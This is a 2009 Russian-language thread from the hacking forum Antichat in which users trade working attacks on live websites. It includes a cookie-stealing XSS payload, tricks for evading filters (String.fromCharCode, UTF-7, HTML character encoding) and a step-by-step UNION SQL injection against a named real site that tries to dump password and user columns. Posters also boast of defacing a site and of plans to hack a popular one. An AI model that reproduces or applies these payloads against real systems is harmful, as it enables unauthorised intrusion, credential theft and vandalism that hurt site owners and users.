Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.07.2009, 16:50
|
|
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521
Репутация:
34
|
|
Сообщение от Calcutta
"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)
Problema so znakom "="
|
|
|
17.07.2009, 17:06
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2. 5 ветка требует закрытых /* коментов (как mssql)
Поправлю:
>= MySQL 5.0.51
До этого можно незакрытые
|
|
|
|
17.07.2009, 17:49
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 4
Провел на форуме:
4330
Репутация:
0
|
|
The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))
|
|
|
|
17.07.2009, 20:58
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.
Последний раз редактировалось nub-hacker; 17.07.2009 в 21:04..
|
|
|
|
17.07.2009, 21:06
|
|
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788
Репутация:
327
|
|
Используй String.fromCharCode()
|
|
|
|
17.07.2009, 21:10
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от br3k
Используй String.fromCharCode()
так как я использую эту функцию если я пихаю в поле <script>alert()</script> и в исходниках без <>
вот так scriptalert()/script
|
|
|
|
17.07.2009, 21:18
|
|
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788
Репутация:
327
|
|
Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”
|
|
|
|
17.07.2009, 21:21
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
нубхакер
http://ha.ckers.org/xss.html там снизу есть Character Encoding Calculator
В поле ASCII Text: вставляешь <script>alert('')</script>
Жмешь encode
Дальше содержимое
Decimal Value:
HTML (without semicolons):
Копируешь и подставляешь там где уязвимый параметр
|
|
|
|
17.07.2009, 21:21
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от br3k
Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”
это сакс, работает токо в ослике. не факт, что у админа осёл. ЗЫ вопрос. в версии phpbb 2.0.xx в куках лежит хэш пасс?
add// нашол нормальную пасивку, всё теперь буду хекать популярный сайт.
|
|
|
|
17.07.2009, 22:18
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
народ пытался раскрутить не получается взять )
http://www.***.com/news/news.php?id=2983+union+select+1,2,3,4,5,6,7,8,9/*
http://www.***.com/news/news.php?id=2983+union+select+1,table_name,3,4,5,6 ,7,8,9+from+information.schema.tables/*
забираю tables:user
подбираю колонки переведя таблицу в sqlhex - password, user
Пытаюсь добыть инфу
http://www.***/news/news.php?id=2983+union+select+1,concat_ws(0x3a,pas sword,user),3,4,5,6,7,8,9+from+user/*
И выходит пустое место где во всех пред случаях работала sql-inj =((( тоесть страница выходит как надо, но место sql пустое (
Вот
http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws%280x3a,password,user %29,3,4,5,6,7,8,9+from+user--
Последний раз редактировалось 2la.painkiller; 17.07.2009 в 22:23..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
